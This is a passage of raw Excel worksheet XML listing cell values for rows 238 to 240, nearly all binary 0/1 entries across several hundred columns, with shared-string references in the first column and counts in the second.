        <v>0</v>
      </c>
      <c r="PY238">
        <v>0</v>
      </c>
      <c r="PZ238">
        <v>0</v>
      </c>
      <c r="QA238">
        <v>0</v>
      </c>
      <c r="QB238">
        <v>0</v>
      </c>
      <c r="QC238">
        <v>0</v>
      </c>
      <c r="QD238">
        <v>0</v>
      </c>
      <c r="QE238">
        <v>0</v>
      </c>
      <c r="QF238">
        <v>0</v>
      </c>
      <c r="QG238">
        <v>0</v>
      </c>
      <c r="QH238">
        <v>0</v>
      </c>
      <c r="QI238">
        <v>0</v>
      </c>
      <c r="QJ238">
        <v>0</v>
      </c>
      <c r="QK238">
        <v>0</v>
      </c>
      <c r="QL238">
        <v>0</v>
      </c>
      <c r="QM238">
        <v>0</v>
      </c>
      <c r="QN238">
        <v>0</v>
      </c>
      <c r="QO238">
        <v>0</v>
      </c>
      <c r="QP238">
        <v>0</v>
      </c>
      <c r="QQ238">
        <v>0</v>
      </c>
      <c r="QR238">
        <v>0</v>
      </c>
      <c r="QS238">
        <v>0</v>
      </c>
      <c r="QT238">
        <v>0</v>
      </c>
      <c r="QU238">
        <v>0</v>
      </c>
      <c r="QV238">
        <v>0</v>
      </c>
      <c r="QW238">
        <v>0</v>
      </c>
      <c r="QX238">
        <v>0</v>
      </c>
      <c r="QY238">
        <v>0</v>
      </c>
      <c r="QZ238">
        <v>0</v>
      </c>
      <c r="RA238">
        <v>0</v>
      </c>
      <c r="RB238">
        <v>0</v>
      </c>
      <c r="RC238">
        <v>0</v>
      </c>
      <c r="RD238">
        <v>0</v>
      </c>
      <c r="RE238">
        <v>0</v>
      </c>
      <c r="RF238">
        <v>0</v>
      </c>
      <c r="RG238">
        <v>0</v>
      </c>
      <c r="RH238">
        <v>0</v>
      </c>
      <c r="RI238">
        <v>0</v>
      </c>
      <c r="RJ238">
        <v>0</v>
      </c>
      <c r="RK238">
        <v>0</v>
      </c>
      <c r="RL238">
        <v>0</v>
      </c>
      <c r="RM238">
        <v>0</v>
      </c>
      <c r="RN238">
        <v>0</v>
      </c>
      <c r="RO238">
        <v>0</v>
      </c>
      <c r="RP238">
        <v>0</v>
      </c>
      <c r="RQ238">
        <v>0</v>
      </c>
      <c r="RR238">
        <v>0</v>
      </c>
      <c r="RS238">
        <v>0</v>
      </c>
      <c r="RT238">
        <v>0</v>
      </c>
      <c r="RU238">
        <v>0</v>
      </c>
      <c r="RV238">
        <v>0</v>
      </c>
      <c r="RW238">
        <v>0</v>
      </c>
      <c r="RX238">
        <v>0</v>
      </c>
      <c r="RY238">
        <v>0</v>
      </c>
      <c r="RZ238">
        <v>0</v>
      </c>
      <c r="SA238">
        <v>0</v>
      </c>
    </row>
    <row r="239" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A239" s="6" t="s">
        <v>5362</v>
      </c>
      <c r="B239">
        <v>215</v>
      </c>
      <c r="C239">
        <v>0</v>
      </c>
      <c r="D239">
        <v>1</v>
      </c>
      <c r="E239">
        <v>0</v>
      </c>
      <c r="F239">
        <v>1</v>
      </c>
      <c r="G239">
        <v>0</v>
      </c>
      <c r="H239">
        <v>0</v>
      </c>
      <c r="I239">
        <v>1</v>
      </c>
      <c r="J239">
        <v>0</v>
      </c>
      <c r="K239">
        <v>1</v>
      </c>
      <c r="L239">
        <v>1</v>
      </c>
      <c r="M239">
        <v>1</v>
      </c>
      <c r="N239">
        <v>0</v>
      </c>
      <c r="O239">
        <v>1</v>
      </c>
      <c r="P239">
        <v>1</v>
      </c>
      <c r="Q239">
        <v>0</v>
      </c>
      <c r="R239">
        <v>0</v>
      </c>
      <c r="S239">
        <v>1</v>
      </c>
      <c r="T239">
        <v>1</v>
      </c>
      <c r="U239">
        <v>1</v>
      </c>
      <c r="V239">
        <v>1</v>
      </c>
      <c r="W239">
        <v>0</v>
      </c>
      <c r="X239">
        <v>0</v>
      </c>
      <c r="Y239">
        <v>0</v>
      </c>
      <c r="Z239">
        <v>1</v>
      </c>
      <c r="AA239">
        <v>0</v>
      </c>
      <c r="AB239">
        <v>0</v>
      </c>
      <c r="AC239">
        <v>1</v>
      </c>
      <c r="AD239">
        <v>0</v>
      </c>
      <c r="AE239">
        <v>0</v>
      </c>
      <c r="AF239">
        <v>0</v>
      </c>
      <c r="AG239">
        <v>0</v>
      </c>
      <c r="AH239">
        <v>1</v>
      </c>
      <c r="AI239">
        <v>1</v>
      </c>
      <c r="AJ239">
        <v>1</v>
      </c>
      <c r="AK239">
        <v>1</v>
      </c>
      <c r="AL239">
        <v>1</v>
      </c>
      <c r="AM239">
        <v>0</v>
      </c>
      <c r="AN239">
        <v>1</v>
      </c>
      <c r="AO239">
        <v>1</v>
      </c>
      <c r="AP239">
        <v>0</v>
      </c>
      <c r="AQ239">
        <v>1</v>
      </c>
      <c r="AR239">
        <v>0</v>
      </c>
      <c r="AS239">
        <v>1</v>
      </c>
      <c r="AT239">
        <v>1</v>
      </c>
      <c r="AU239">
        <v>0</v>
      </c>
      <c r="AV239">
        <v>1</v>
      </c>
      <c r="AW239">
        <v>1</v>
      </c>
      <c r="AX239">
        <v>0</v>
      </c>
      <c r="AY239">
        <v>1</v>
      </c>
      <c r="AZ239">
        <v>0</v>
      </c>
      <c r="BA239">
        <v>0</v>
      </c>
      <c r="BB239">
        <v>1</v>
      </c>
      <c r="BC239">
        <v>0</v>
      </c>
      <c r="BD239">
        <v>0</v>
      </c>
      <c r="BE239">
        <v>0</v>
      </c>
      <c r="BF239">
        <v>1</v>
      </c>
      <c r="BG239">
        <v>0</v>
      </c>
      <c r="BH239">
        <v>0</v>
      </c>
      <c r="BI239">
        <v>1</v>
      </c>
      <c r="BJ239">
        <v>0</v>
      </c>
      <c r="BK239">
        <v>0</v>
      </c>
      <c r="BL239">
        <v>1</v>
      </c>
      <c r="BM239">
        <v>0</v>
      </c>
      <c r="BN239">
        <v>1</v>
      </c>
      <c r="BO239">
        <v>0</v>
      </c>
      <c r="BP239">
        <v>1</v>
      </c>
      <c r="BQ239">
        <v>0</v>
      </c>
      <c r="BR239">
        <v>1</v>
      </c>
      <c r="BS239">
        <v>1</v>
      </c>
      <c r="BT239">
        <v>0</v>
      </c>
      <c r="BU239">
        <v>0</v>
      </c>
      <c r="BV239">
        <v>0</v>
      </c>
      <c r="BW239">
        <v>0</v>
      </c>
      <c r="BX239">
        <v>0</v>
      </c>
      <c r="BY239">
        <v>0</v>
      </c>
      <c r="BZ239">
        <v>0</v>
      </c>
      <c r="CA239">
        <v>0</v>
      </c>
      <c r="CB239">
        <v>1</v>
      </c>
      <c r="CC239">
        <v>0</v>
      </c>
      <c r="CD239">
        <v>0</v>
      </c>
      <c r="CE239">
        <v>0</v>
      </c>
      <c r="CF239">
        <v>0</v>
      </c>
      <c r="CG239">
        <v>1</v>
      </c>
      <c r="CH239">
        <v>1</v>
      </c>
      <c r="CI239">
        <v>1</v>
      </c>
      <c r="CJ239">
        <v>0</v>
      </c>
      <c r="CK239">
        <v>0</v>
      </c>
      <c r="CL239">
        <v>0</v>
      </c>
      <c r="CM239">
        <v>0</v>
      </c>
      <c r="CN239">
        <v>0</v>
      </c>
      <c r="CO239">
        <v>0</v>
      </c>
      <c r="CP239">
        <v>1</v>
      </c>
      <c r="CQ239">
        <v>0</v>
      </c>
      <c r="CR239">
        <v>0</v>
      </c>
      <c r="CS239">
        <v>1</v>
      </c>
      <c r="CT239">
        <v>1</v>
      </c>
      <c r="CU239">
        <v>0</v>
      </c>
      <c r="CV239">
        <v>0</v>
      </c>
      <c r="CW239">
        <v>0</v>
      </c>
      <c r="CX239">
        <v>1</v>
      </c>
      <c r="CY239">
        <v>0</v>
      </c>
      <c r="CZ239">
        <v>0</v>
      </c>
      <c r="DA239">
        <v>1</v>
      </c>
      <c r="DB239">
        <v>0</v>
      </c>
      <c r="DC239">
        <v>1</v>
      </c>
      <c r="DD239">
        <v>0</v>
      </c>
      <c r="DE239">
        <v>1</v>
      </c>
      <c r="DF239">
        <v>1</v>
      </c>
      <c r="DG239">
        <v>0</v>
      </c>
      <c r="DH239">
        <v>0</v>
      </c>
      <c r="DI239">
        <v>1</v>
      </c>
      <c r="DJ239">
        <v>0</v>
      </c>
      <c r="DK239">
        <v>1</v>
      </c>
      <c r="DL239">
        <v>1</v>
      </c>
      <c r="DM239">
        <v>1</v>
      </c>
      <c r="DN239">
        <v>0</v>
      </c>
      <c r="DO239">
        <v>1</v>
      </c>
      <c r="DP239">
        <v>1</v>
      </c>
      <c r="DQ239">
        <v>0</v>
      </c>
      <c r="DR239">
        <v>0</v>
      </c>
      <c r="DS239">
        <v>0</v>
      </c>
      <c r="DT239">
        <v>0</v>
      </c>
      <c r="DU239">
        <v>0</v>
      </c>
      <c r="DV239">
        <v>1</v>
      </c>
      <c r="DW239">
        <v>1</v>
      </c>
      <c r="DX239">
        <v>1</v>
      </c>
      <c r="DY239">
        <v>0</v>
      </c>
      <c r="DZ239">
        <v>0</v>
      </c>
      <c r="EA239">
        <v>0</v>
      </c>
      <c r="EB239">
        <v>0</v>
      </c>
      <c r="EC239">
        <v>1</v>
      </c>
      <c r="ED239">
        <v>1</v>
      </c>
      <c r="EE239">
        <v>0</v>
      </c>
      <c r="EF239">
        <v>1</v>
      </c>
      <c r="EG239">
        <v>1</v>
      </c>
      <c r="EH239">
        <v>0</v>
      </c>
      <c r="EI239">
        <v>1</v>
      </c>
      <c r="EJ239">
        <v>0</v>
      </c>
      <c r="EK239">
        <v>0</v>
      </c>
      <c r="EL239">
        <v>0</v>
      </c>
      <c r="EM239">
        <v>0</v>
      </c>
      <c r="EN239">
        <v>1</v>
      </c>
      <c r="EO239">
        <v>0</v>
      </c>
      <c r="EP239">
        <v>1</v>
      </c>
      <c r="EQ239">
        <v>0</v>
      </c>
      <c r="ER239">
        <v>0</v>
      </c>
      <c r="ES239">
        <v>1</v>
      </c>
      <c r="ET239">
        <v>1</v>
      </c>
      <c r="EU239">
        <v>0</v>
      </c>
      <c r="EV239">
        <v>0</v>
      </c>
      <c r="EW239">
        <v>1</v>
      </c>
      <c r="EX239">
        <v>0</v>
      </c>
      <c r="EY239">
        <v>1</v>
      </c>
      <c r="EZ239">
        <v>1</v>
      </c>
      <c r="FA239">
        <v>0</v>
      </c>
      <c r="FB239">
        <v>0</v>
      </c>
      <c r="FC239">
        <v>0</v>
      </c>
      <c r="FD239">
        <v>1</v>
      </c>
      <c r="FE239">
        <v>0</v>
      </c>
      <c r="FF239">
        <v>1</v>
      </c>
      <c r="FG239">
        <v>0</v>
      </c>
      <c r="FH239">
        <v>1</v>
      </c>
      <c r="FI239">
        <v>0</v>
      </c>
      <c r="FJ239">
        <v>0</v>
      </c>
      <c r="FK239">
        <v>0</v>
      </c>
      <c r="FL239">
        <v>1</v>
      </c>
      <c r="FM239">
        <v>0</v>
      </c>
      <c r="FN239">
        <v>0</v>
      </c>
      <c r="FO239">
        <v>0</v>
      </c>
      <c r="FP239">
        <v>0</v>
      </c>
      <c r="FQ239">
        <v>0</v>
      </c>
      <c r="FR239">
        <v>0</v>
      </c>
      <c r="FS239">
        <v>0</v>
      </c>
      <c r="FT239">
        <v>0</v>
      </c>
      <c r="FU239">
        <v>0</v>
      </c>
      <c r="FV239">
        <v>1</v>
      </c>
      <c r="FW239">
        <v>1</v>
      </c>
      <c r="FX239">
        <v>1</v>
      </c>
      <c r="FY239">
        <v>0</v>
      </c>
      <c r="FZ239">
        <v>0</v>
      </c>
      <c r="GA239">
        <v>0</v>
      </c>
      <c r="GB239">
        <v>1</v>
      </c>
      <c r="GC239">
        <v>0</v>
      </c>
      <c r="GD239">
        <v>0</v>
      </c>
      <c r="GE239">
        <v>1</v>
      </c>
      <c r="GF239">
        <v>1</v>
      </c>
      <c r="GG239">
        <v>0</v>
      </c>
      <c r="GH239">
        <v>0</v>
      </c>
      <c r="GI239">
        <v>1</v>
      </c>
      <c r="GJ239">
        <v>0</v>
      </c>
      <c r="GK239">
        <v>1</v>
      </c>
      <c r="GL239">
        <v>1</v>
      </c>
      <c r="GM239">
        <v>0</v>
      </c>
      <c r="GN239">
        <v>0</v>
      </c>
      <c r="GO239">
        <v>1</v>
      </c>
      <c r="GP239">
        <v>1</v>
      </c>
      <c r="GQ239">
        <v>1</v>
      </c>
      <c r="GR239">
        <v>1</v>
      </c>
      <c r="GS239">
        <v>1</v>
      </c>
      <c r="GT239">
        <v>1</v>
      </c>
      <c r="GU239">
        <v>1</v>
      </c>
      <c r="GV239">
        <v>0</v>
      </c>
      <c r="GW239">
        <v>1</v>
      </c>
      <c r="GX239">
        <v>1</v>
      </c>
      <c r="GY239">
        <v>0</v>
      </c>
      <c r="GZ239">
        <v>0</v>
      </c>
      <c r="HA239">
        <v>0</v>
      </c>
      <c r="HB239">
        <v>0</v>
      </c>
      <c r="HC239">
        <v>0</v>
      </c>
      <c r="HD239">
        <v>1</v>
      </c>
      <c r="HE239">
        <v>0</v>
      </c>
      <c r="HF239">
        <v>0</v>
      </c>
      <c r="HG239">
        <v>1</v>
      </c>
      <c r="HH239">
        <v>1</v>
      </c>
      <c r="HI239">
        <v>0</v>
      </c>
      <c r="HJ239">
        <v>0</v>
      </c>
      <c r="HK239">
        <v>0</v>
      </c>
      <c r="HL239">
        <v>1</v>
      </c>
      <c r="HM239">
        <v>0</v>
      </c>
      <c r="HN239">
        <v>1</v>
      </c>
      <c r="HO239">
        <v>0</v>
      </c>
      <c r="HP239">
        <v>1</v>
      </c>
      <c r="HQ239">
        <v>0</v>
      </c>
      <c r="HR239">
        <v>0</v>
      </c>
      <c r="HS239">
        <v>0</v>
      </c>
      <c r="HT239">
        <v>1</v>
      </c>
      <c r="HU239">
        <v>0</v>
      </c>
      <c r="HV239">
        <v>1</v>
      </c>
      <c r="HW239">
        <v>0</v>
      </c>
      <c r="HX239">
        <v>0</v>
      </c>
      <c r="HY239">
        <v>1</v>
      </c>
      <c r="HZ239">
        <v>0</v>
      </c>
      <c r="IA239">
        <v>0</v>
      </c>
      <c r="IB239">
        <v>0</v>
      </c>
      <c r="IC239">
        <v>1</v>
      </c>
      <c r="ID239">
        <v>1</v>
      </c>
      <c r="IE239">
        <v>0</v>
      </c>
      <c r="IF239">
        <v>0</v>
      </c>
      <c r="IG239">
        <v>0</v>
      </c>
      <c r="IH239">
        <v>1</v>
      </c>
      <c r="II239">
        <v>1</v>
      </c>
      <c r="IJ239">
        <v>1</v>
      </c>
      <c r="IK239">
        <v>1</v>
      </c>
      <c r="IL239">
        <v>0</v>
      </c>
      <c r="IM239">
        <v>1</v>
      </c>
      <c r="IN239">
        <v>1</v>
      </c>
      <c r="IO239">
        <v>1</v>
      </c>
      <c r="IP239">
        <v>1</v>
      </c>
      <c r="IQ239">
        <v>0</v>
      </c>
      <c r="IR239">
        <v>0</v>
      </c>
      <c r="IS239">
        <v>1</v>
      </c>
      <c r="IT239">
        <v>0</v>
      </c>
      <c r="IU239">
        <v>1</v>
      </c>
      <c r="IV239">
        <v>1</v>
      </c>
      <c r="IW239">
        <v>1</v>
      </c>
      <c r="IX239">
        <v>1</v>
      </c>
      <c r="IY239">
        <v>0</v>
      </c>
      <c r="IZ239">
        <v>1</v>
      </c>
      <c r="JA239">
        <v>0</v>
      </c>
      <c r="JB239">
        <v>0</v>
      </c>
      <c r="JC239">
        <v>0</v>
      </c>
      <c r="JD239">
        <v>0</v>
      </c>
      <c r="JE239">
        <v>1</v>
      </c>
      <c r="JF239">
        <v>0</v>
      </c>
      <c r="JG239">
        <v>0</v>
      </c>
      <c r="JH239">
        <v>0</v>
      </c>
      <c r="JI239">
        <v>0</v>
      </c>
      <c r="JJ239">
        <v>0</v>
      </c>
      <c r="JK239">
        <v>1</v>
      </c>
      <c r="JL239">
        <v>1</v>
      </c>
      <c r="JM239">
        <v>1</v>
      </c>
      <c r="JN239">
        <v>1</v>
      </c>
      <c r="JO239">
        <v>1</v>
      </c>
      <c r="JP239">
        <v>1</v>
      </c>
      <c r="JQ239">
        <v>0</v>
      </c>
      <c r="JR239">
        <v>0</v>
      </c>
      <c r="JS239">
        <v>1</v>
      </c>
      <c r="JT239">
        <v>1</v>
      </c>
      <c r="JU239">
        <v>0</v>
      </c>
      <c r="JV239">
        <v>0</v>
      </c>
      <c r="JW239">
        <v>0</v>
      </c>
      <c r="JX239">
        <v>0</v>
      </c>
      <c r="JY239">
        <v>0</v>
      </c>
      <c r="JZ239">
        <v>1</v>
      </c>
      <c r="KA239">
        <v>0</v>
      </c>
      <c r="KB239">
        <v>1</v>
      </c>
      <c r="KC239">
        <v>0</v>
      </c>
      <c r="KD239">
        <v>0</v>
      </c>
      <c r="KE239">
        <v>1</v>
      </c>
      <c r="KF239">
        <v>0</v>
      </c>
      <c r="KG239">
        <v>1</v>
      </c>
      <c r="KH239">
        <v>1</v>
      </c>
      <c r="KI239">
        <v>0</v>
      </c>
      <c r="KJ239">
        <v>1</v>
      </c>
      <c r="KK239">
        <v>0</v>
      </c>
      <c r="KL239">
        <v>1</v>
      </c>
      <c r="KM239">
        <v>1</v>
      </c>
      <c r="KN239">
        <v>0</v>
      </c>
      <c r="KO239">
        <v>1</v>
      </c>
      <c r="KP239">
        <v>0</v>
      </c>
      <c r="KQ239">
        <v>1</v>
      </c>
      <c r="KR239">
        <v>1</v>
      </c>
      <c r="KS239">
        <v>0</v>
      </c>
      <c r="KT239">
        <v>1</v>
      </c>
      <c r="KU239">
        <v>0</v>
      </c>
      <c r="KV239">
        <v>0</v>
      </c>
      <c r="KW239">
        <v>1</v>
      </c>
      <c r="KX239">
        <v>1</v>
      </c>
      <c r="KY239">
        <v>0</v>
      </c>
      <c r="KZ239">
        <v>1</v>
      </c>
      <c r="LA239">
        <v>1</v>
      </c>
      <c r="LB239">
        <v>0</v>
      </c>
      <c r="LC239">
        <v>0</v>
      </c>
      <c r="LD239">
        <v>1</v>
      </c>
      <c r="LE239">
        <v>0</v>
      </c>
      <c r="LF239">
        <v>1</v>
      </c>
      <c r="LG239">
        <v>0</v>
      </c>
      <c r="LH239">
        <v>0</v>
      </c>
      <c r="LI239">
        <v>0</v>
      </c>
      <c r="LJ239">
        <v>1</v>
      </c>
      <c r="LK239">
        <v>0</v>
      </c>
      <c r="LL239">
        <v>0</v>
      </c>
      <c r="LM239">
        <v>1</v>
      </c>
      <c r="LN239">
        <v>0</v>
      </c>
      <c r="LO239">
        <v>1</v>
      </c>
      <c r="LP239">
        <v>0</v>
      </c>
      <c r="LQ239">
        <v>0</v>
      </c>
      <c r="LR239">
        <v>1</v>
      </c>
      <c r="LS239">
        <v>0</v>
      </c>
      <c r="LT239">
        <v>0</v>
      </c>
      <c r="LU239">
        <v>0</v>
      </c>
      <c r="LV239">
        <v>1</v>
      </c>
      <c r="LW239">
        <v>1</v>
      </c>
      <c r="LX239">
        <v>0</v>
      </c>
      <c r="LY239">
        <v>0</v>
      </c>
      <c r="LZ239">
        <v>1</v>
      </c>
      <c r="MA239">
        <v>0</v>
      </c>
      <c r="MB239">
        <v>0</v>
      </c>
      <c r="MC239">
        <v>1</v>
      </c>
      <c r="MD239">
        <v>1</v>
      </c>
      <c r="ME239">
        <v>0</v>
      </c>
      <c r="MF239">
        <v>0</v>
      </c>
      <c r="MG239">
        <v>0</v>
      </c>
      <c r="MH239">
        <v>0</v>
      </c>
      <c r="MI239">
        <v>0</v>
      </c>
      <c r="MJ239">
        <v>0</v>
      </c>
      <c r="MK239">
        <v>0</v>
      </c>
      <c r="ML239">
        <v>1</v>
      </c>
      <c r="MM239">
        <v>0</v>
      </c>
      <c r="MN239">
        <v>1</v>
      </c>
      <c r="MO239">
        <v>1</v>
      </c>
      <c r="MP239">
        <v>1</v>
      </c>
      <c r="MQ239">
        <v>0</v>
      </c>
      <c r="MR239">
        <v>1</v>
      </c>
      <c r="MS239">
        <v>0</v>
      </c>
      <c r="MT239">
        <v>0</v>
      </c>
      <c r="MU239">
        <v>1</v>
      </c>
      <c r="MV239">
        <v>0</v>
      </c>
      <c r="MW239">
        <v>1</v>
      </c>
      <c r="MX239">
        <v>1</v>
      </c>
      <c r="MY239">
        <v>0</v>
      </c>
      <c r="MZ239">
        <v>0</v>
      </c>
      <c r="NA239">
        <v>1</v>
      </c>
      <c r="NB239">
        <v>0</v>
      </c>
      <c r="NC239">
        <v>0</v>
      </c>
      <c r="ND239">
        <v>1</v>
      </c>
      <c r="NE239">
        <v>1</v>
      </c>
      <c r="NF239">
        <v>1</v>
      </c>
      <c r="NG239">
        <v>0</v>
      </c>
      <c r="NH239">
        <v>1</v>
      </c>
      <c r="NI239">
        <v>0</v>
      </c>
      <c r="NJ239">
        <v>0</v>
      </c>
      <c r="NK239">
        <v>1</v>
      </c>
      <c r="NL239">
        <v>0</v>
      </c>
      <c r="NM239">
        <v>0</v>
      </c>
      <c r="NN239">
        <v>0</v>
      </c>
      <c r="NO239">
        <v>1</v>
      </c>
      <c r="NP239">
        <v>0</v>
      </c>
      <c r="NQ239">
        <v>0</v>
      </c>
      <c r="NR239">
        <v>0</v>
      </c>
      <c r="NS239">
        <v>0</v>
      </c>
      <c r="NT239">
        <v>1</v>
      </c>
      <c r="NU239">
        <v>1</v>
      </c>
      <c r="NV239">
        <v>1</v>
      </c>
      <c r="NW239">
        <v>1</v>
      </c>
      <c r="NX239">
        <v>0</v>
      </c>
      <c r="NY239">
        <v>1</v>
      </c>
      <c r="NZ239">
        <v>0</v>
      </c>
      <c r="OA239">
        <v>0</v>
      </c>
      <c r="OB239">
        <v>1</v>
      </c>
      <c r="OC239">
        <v>0</v>
      </c>
      <c r="OD239">
        <v>0</v>
      </c>
      <c r="OE239">
        <v>1</v>
      </c>
      <c r="OF239">
        <v>1</v>
      </c>
      <c r="OG239">
        <v>1</v>
      </c>
      <c r="OH239">
        <v>1</v>
      </c>
      <c r="OI239">
        <v>0</v>
      </c>
      <c r="OJ239">
        <v>1</v>
      </c>
      <c r="OK239">
        <v>1</v>
      </c>
      <c r="OL239">
        <v>1</v>
      </c>
      <c r="OM239">
        <v>0</v>
      </c>
      <c r="ON239">
        <v>1</v>
      </c>
      <c r="OO239">
        <v>1</v>
      </c>
      <c r="OP239">
        <v>1</v>
      </c>
      <c r="OQ239">
        <v>1</v>
      </c>
      <c r="OR239">
        <v>1</v>
      </c>
      <c r="OS239">
        <v>0</v>
      </c>
      <c r="OT239">
        <v>0</v>
      </c>
      <c r="OU239">
        <v>0</v>
      </c>
      <c r="OV239">
        <v>0</v>
      </c>
      <c r="OW239">
        <v>0</v>
      </c>
      <c r="OX239">
        <v>1</v>
      </c>
      <c r="OY239">
        <v>1</v>
      </c>
      <c r="OZ239">
        <v>0</v>
      </c>
      <c r="PA239">
        <v>1</v>
      </c>
      <c r="PB239">
        <v>0</v>
      </c>
      <c r="PC239">
        <v>0</v>
      </c>
      <c r="PD239">
        <v>0</v>
      </c>
      <c r="PE239">
        <v>0</v>
      </c>
      <c r="PF239">
        <v>1</v>
      </c>
      <c r="PG239">
        <v>1</v>
      </c>
      <c r="PH239">
        <v>0</v>
      </c>
      <c r="PI239">
        <v>0</v>
      </c>
      <c r="PJ239">
        <v>0</v>
      </c>
      <c r="PK239">
        <v>0</v>
      </c>
      <c r="PL239">
        <v>1</v>
      </c>
      <c r="PM239">
        <v>0</v>
      </c>
      <c r="PN239">
        <v>0</v>
      </c>
      <c r="PO239">
        <v>0</v>
      </c>
      <c r="PP239">
        <v>1</v>
      </c>
      <c r="PQ239">
        <v>0</v>
      </c>
      <c r="PR239">
        <v>1</v>
      </c>
      <c r="PS239">
        <v>0</v>
      </c>
      <c r="PT239">
        <v>1</v>
      </c>
      <c r="PU239">
        <v>1</v>
      </c>
      <c r="PV239">
        <v>0</v>
      </c>
      <c r="PW239">
        <v>1</v>
      </c>
      <c r="PX239">
        <v>0</v>
      </c>
      <c r="PY239">
        <v>1</v>
      </c>
      <c r="PZ239">
        <v>1</v>
      </c>
      <c r="QA239">
        <v>0</v>
      </c>
      <c r="QB239">
        <v>0</v>
      </c>
      <c r="QC239">
        <v>0</v>
      </c>
      <c r="QD239">
        <v>1</v>
      </c>
      <c r="QE239">
        <v>0</v>
      </c>
      <c r="QF239">
        <v>1</v>
      </c>
      <c r="QG239">
        <v>0</v>
      </c>
      <c r="QH239">
        <v>0</v>
      </c>
      <c r="QI239">
        <v>0</v>
      </c>
      <c r="QJ239">
        <v>1</v>
      </c>
      <c r="QK239">
        <v>0</v>
      </c>
      <c r="QL239">
        <v>0</v>
      </c>
      <c r="QM239">
        <v>0</v>
      </c>
      <c r="QN239">
        <v>1</v>
      </c>
      <c r="QO239">
        <v>0</v>
      </c>
      <c r="QP239">
        <v>0</v>
      </c>
      <c r="QQ239">
        <v>1</v>
      </c>
      <c r="QR239">
        <v>1</v>
      </c>
      <c r="QS239">
        <v>1</v>
      </c>
      <c r="QT239">
        <v>1</v>
      </c>
      <c r="QU239">
        <v>0</v>
      </c>
      <c r="QV239">
        <v>1</v>
      </c>
      <c r="QW239">
        <v>1</v>
      </c>
      <c r="QX239">
        <v>0</v>
      </c>
      <c r="QY239">
        <v>0</v>
      </c>
      <c r="QZ239">
        <v>1</v>
      </c>
      <c r="RA239">
        <v>0</v>
      </c>
      <c r="RB239">
        <v>1</v>
      </c>
      <c r="RC239">
        <v>1</v>
      </c>
      <c r="RD239">
        <v>0</v>
      </c>
      <c r="RE239">
        <v>0</v>
      </c>
      <c r="RF239">
        <v>1</v>
      </c>
      <c r="RG239">
        <v>0</v>
      </c>
      <c r="RH239">
        <v>0</v>
      </c>
      <c r="RI239">
        <v>0</v>
      </c>
      <c r="RJ239">
        <v>0</v>
      </c>
      <c r="RK239">
        <v>0</v>
      </c>
      <c r="RL239">
        <v>0</v>
      </c>
      <c r="RM239">
        <v>1</v>
      </c>
      <c r="RN239">
        <v>0</v>
      </c>
      <c r="RO239">
        <v>0</v>
      </c>
      <c r="RP239">
        <v>0</v>
      </c>
      <c r="RQ239">
        <v>0</v>
      </c>
      <c r="RR239">
        <v>1</v>
      </c>
      <c r="RS239">
        <v>0</v>
      </c>
      <c r="RT239">
        <v>0</v>
      </c>
      <c r="RU239">
        <v>0</v>
      </c>
      <c r="RV239">
        <v>0</v>
      </c>
      <c r="RW239">
        <v>0</v>
      </c>
      <c r="RX239">
        <v>0</v>
      </c>
      <c r="RY239">
        <v>0</v>
      </c>
      <c r="RZ239">
        <v>1</v>
      </c>
      <c r="SA239">
        <v>1</v>
      </c>
    </row>
    <row r="240" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A240" s="6" t="s">
        <v>5374</v>
      </c>
      <c r="B240">
        <v>143</v>
      </c>
      <c r="C240">
        <v>0</v>
      </c>
      <c r="D240">
        <v>0</v>
      </c>
      <c r="E240">
        <v>0</v>
      </c>
      <c r="F240">
        <v>0</v>
      </c>
      <c r="G240">
        <v>0</v>
      </c>
      <c r="H240">
        <v>1</v>
      </c>
      <c r="I240">
        <v>1</v>
      </c>
      <c r="J240">
        <v>1</v>
      </c>
      <c r="K240">
        <v>1</v>
      </c>
      <c r="L240">
        <v>0</v>
      </c>
      <c r="M240">
        <v>1</v>
      </c>
      <c r="N240">
        <v>1</v>
      </c>
      <c r="O240">
        <v>1</v>
      </c>
      <c r="P240">
        <v>0</v>
      </c>
      <c r="Q240">
        <v>0</v>
      </c>
      <c r="R240">
        <v>0</v>
      </c>
      <c r="S240">
        <v>1</v>
      </c>
      <c r="T240">
        <v>1</v>
      </c>
      <c r="U240">
        <v>0</v>
      </c>
      <c r="V240">
        <v>1</v>
      </c>
      <c r="W240">
        <v>0</v>
      </c>
      <c r="X240">
        <v>0</v>
      </c>
      <c r="Y240">
        <v>0</v>
      </c>
      <c r="Z240">
        <v>0</v>
      </c>
      <c r="AA240">
        <v>0</v>
      </c>
      <c r="AB240">
        <v>0</v>
      </c>
      <c r="AC240">
        <v>1</v>
      </c>
      <c r="AD240">
        <v>0</v>
      </c>
      <c r="AE240">
        <v>0</v>
      </c>
      <c r="AF240">
        <v>0</v>
      </c>
      <c r="AG240">
        <v>0</v>
      </c>
      <c r="AH240">
        <v>0</v>
      </c>
      <c r="AI240">
        <v>1</v>
      </c>
      <c r="AJ240">
        <v>0</v>
      </c>
      <c r="AK240">
        <v>1</v>
      </c>
      <c r="AL240">
        <v>0</v>
      </c>
      <c r="AM240">
        <v>0</v>
      </c>
      <c r="AN240">
        <v>0</v>
      </c>
      <c r="AO240">
        <v>1</v>
      </c>
      <c r="AP240">
        <v>0</v>
      </c>
      <c r="AQ240">
        <v>1</v>
      </c>
      <c r="AR240">
        <v>0</v>
      </c>
      <c r="AS240">
        <v>1</v>
      </c>
      <c r="AT240">
        <v>0</v>
      </c>
      <c r="AU240">
        <v>0</v>
      </c>
      <c r="AV240">
        <v>1</v>
      </c>
      <c r="AW240">
        <v>1</v>
      </c>
      <c r="AX240">
        <v>0</v>
      </c>
      <c r="AY240">
        <v>0</v>
      </c>
      <c r="AZ240">
        <v>0</v>
      </c>
      <c r="BA240">
        <v>0</v>
      </c>
      <c r="BB240">
        <v>0</v>
      </c>
      <c r="BC240">
        <v>0</v>
      </c>
      <c r="BD240">
        <v>0</v>
      </c>
      <c r="BE240">
        <v>0</v>
      </c>
      <c r="BF240">
        <v>0</v>
      </c>
      <c r="BG240">
        <v>0</v>
      </c>
      <c r="BH240">
        <v>0</v>
      </c>
      <c r="BI240">
        <v>0</v>
      </c>
      <c r="BJ240">
        <v>1</v>
      </c>
      <c r="BK240">
        <v>0</v>
      </c>
      <c r="BL240">
        <v>0</v>
      </c>
      <c r="BM240">
        <v>0</v>
      </c>
      <c r="BN240">
        <v>0</v>
      </c>
      <c r="BO240">
        <v>1</v>
      </c>
      <c r="BP240">
        <v>0</v>
      </c>
      <c r="BQ240">
        <v>1</v>
      </c>
      <c r="BR240">
        <v>1</v>
